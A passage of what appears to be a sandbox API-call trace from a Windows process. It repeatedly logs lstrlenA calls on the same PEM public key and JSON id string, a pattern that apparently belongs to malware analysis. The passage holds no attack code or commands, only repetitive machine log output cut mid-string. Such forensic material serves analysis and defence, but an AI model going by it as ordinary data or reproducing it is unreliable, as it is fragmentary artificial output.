KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.251] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.251] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.251] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.251] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.251] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.251] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.253] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.253] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.253] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.253] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.253] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.253] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.253] lstrlenA (lpString="-----BEGIN PUBLIC 